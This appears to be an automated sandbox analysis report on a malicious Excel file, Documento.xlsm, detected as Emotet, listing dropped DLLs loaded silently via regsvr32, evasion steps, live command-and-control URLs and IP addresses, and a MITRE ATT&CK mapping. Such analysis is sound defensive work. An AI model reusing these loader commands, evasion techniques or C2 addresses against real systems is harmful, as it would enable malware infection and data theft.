Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bwfagqlayjve\vhxv.yyo"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wajwuevzvdakzef\rsarmrhrfymvh.bdv"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qqnrprjtrrtdhqc\hwfqlqeqb.xee"

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Source: C:\Windows\SysWOW64\regsvr32.exe

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE233.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 11_2_0024BE5E CreateToolhelp32Snapshot,

Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Documento.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Documento.xlsm	Initial sample: OLE zip file path = xl/calcChain.xml

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: 8833.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1003D2BE push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1003D5BD push ecx; ret

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_1004BC5B LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,

Source: xxw1.ocx.0.dr	Static PE information: real checksum: 0xb1065 should be: 0xabcb9
Source: BRqk58WkNweubruYwrLOt[1].dll.0.dr	Static PE information: real checksum: 0xb1065 should be: 0xabcb9

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\xxw1.ocx	Jump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exe	File created: C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj (copy)	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BRqk58WkNweubruYwrLOt[1].dll	Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe

File created: C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj (copy)

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\xxw1.ocx

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\xxw1.ocx

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Akqqkkcyjpzjtkdl\yjsihfoifzocxh.bje:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Jlwcmhlugcekbvod\wgwqcgkqco.zkn:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Wjoyn\vwxqtwr.dtt:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Fypgzmyquzzcde\otyatzrmngwq.ngt:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Bwfagqlayjve\vhxv.yyo:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Wajwuevzvdakzef\rsarmrhrfymvh.bdv:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Qqnrprjtrrtdhqc\hwfqlqeqb.xee:Zone.Identifier read attributes \| delete

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100175E3 IsIconic,GetWindowPlacement,GetWindowRect,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000B6D0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1124	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2028	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 172	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2576	Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1160	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2128	Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2556	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3064	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2688	Thread sleep time: -240000s >= -30000s

Source: C:\Windows\SysWOW64\regsvr32.exe

API coverage: 3.0 %

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BRqk58WkNweubruYwrLOt[1].dll

Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe

Source: C:\Windows\SysWOW64\regsvr32.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\regsvr32.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\regsvr32.exe	API call chain: ExitProcess graph end node

Source: regsvr32.exe, 00000008.00000002.467854306.00000000005B3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: regsvr32.exe, 00000009.00000002.473212441.0000000000733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_1003CAA2 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1002084E __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1002A9C8 LoadIconA,FindFirstFileA,GetLastError,lstrlenA,SetLastError,__fullpath,__splitpath_s,__makepath_s,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_002627C2 FindFirstFileW,

Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\SysWOW64\regsvr32.exe

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001A32AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002332AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_003032AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D32AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E32AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_002632AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_002432AC mov eax, dword ptr fs:[00000030h]

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_1003B437 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_10008DE0 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,memcpy,

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10049029 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1003B437 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10041ACF _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10048DD7 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10048DF9 __decode_pointer,SetUnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe

Network Connect: 135.148.121.246 144

Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akqqkkcyjpzjtkdl\yjsihfoifzocxh.bje"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Jlwcmhlugcekbvod\wgwqcgkqco.zkn"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wjoyn\vwxqtwr.dtt"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fypgzmyquzzcde\otyatzrmngwq.ngt"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bwfagqlayjve\vhxv.yyo"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wajwuevzvdakzef\rsarmrhrfymvh.bdv"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qqnrprjtrrtdhqc\hwfqlqeqb.xee"

Source: Yara match

File source: app.xml, type: SAMPLE

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,

Source: C:\Windows\SysWOW64\regsvr32.exe

Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_1004C93C cpuid

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_10048CD7 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_10047887 __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_1003CEE0 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,GetCurrentThreadId,__freeptd,

Stealing of Sensitive Information

Yara detected Emotet

Source: Yara match	File source: 9.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.regsvr32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.7e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.regsvr32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.regsvr32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.regsvr32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.regsvr32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.8d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.regsvr32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.7e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.regsvr32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.711848571.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.451639810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.445708809.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.462225822.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.467760078.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.462181637.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.467692271.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.472981981.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.457498778.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.435154889.0000000000160000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.482238250.0000000000230000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1002847B bind,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10010ED0 PeekMessageA,SendMessageA,_memset,recv,htons,SendMessageA,inet_ntoa,inet_ntoa,SendMessageA,inet_ntoa,SendMessageA,SendMessageA,htons,htons,SendMessageA,htons,SendMessageA,SendMessageA,SendMessageA,PeekMessageA,closesocket,socket,_memset,gethostbyname,inet_ntoa,inet_addr,setsockopt,htons,bind,WSAIoctl,closesocket,

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	21 Scripting	Path Interception	1 Access Token Manipulation	1 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	21 Input Capture	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	42 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	21 Scripting	Security Account Manager	37 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	131 Masquerading	LSA Secrets	21 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	11 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	1 Remote System Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Documento.xlsm	40%	Virustotal		Browse
Documento.xlsm	40%	ReversingLabs	Document-Office.Downloader.Encdoc

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
10.2.regsvr32.exe.260000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.2.regsvr32.exe.240000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.regsvr32.exe.1a0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.regsvr32.exe.190000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
9.2.regsvr32.exe.1e0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.regsvr32.exe.200000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.regsvr32.exe.180000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
4.2.regsvr32.exe.230000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.2.regsvr32.exe.1d0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
8.2.regsvr32.exe.1e0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.regsvr32.exe.160000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
5.2.regsvr32.exe.300000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.2.regsvr32.exe.190000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
6.2.regsvr32.exe.8d0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.regsvr32.exe.7e0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.regsvr32.exe.230000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
4.2.regsvr32.exe.1c0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
5.2.regsvr32.exe.150000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File

Domains

Source	Detection	Scanner	Label	Link
www.swaong.com	5%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
https://135.148.121.246/j	100%	Avira URL Cloud	malware
https://135.148.121.246:8080/zPDHHDvtYQmewTlUqnNumfvSgAMeHhZGhBefDhmgdqyEKfqwiccH~A	100%	Avira URL Cloud	malware
https://135.148.121.246:8080/zPDHHDvtYQmewTlUqnNumfvSgAMeHhZGhBefDhmgdqyEKfqwot~H	100%	Avira URL Cloud	malware
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://135.148.121.246/b	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.swaong.com	unknown	unknown	true	5%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
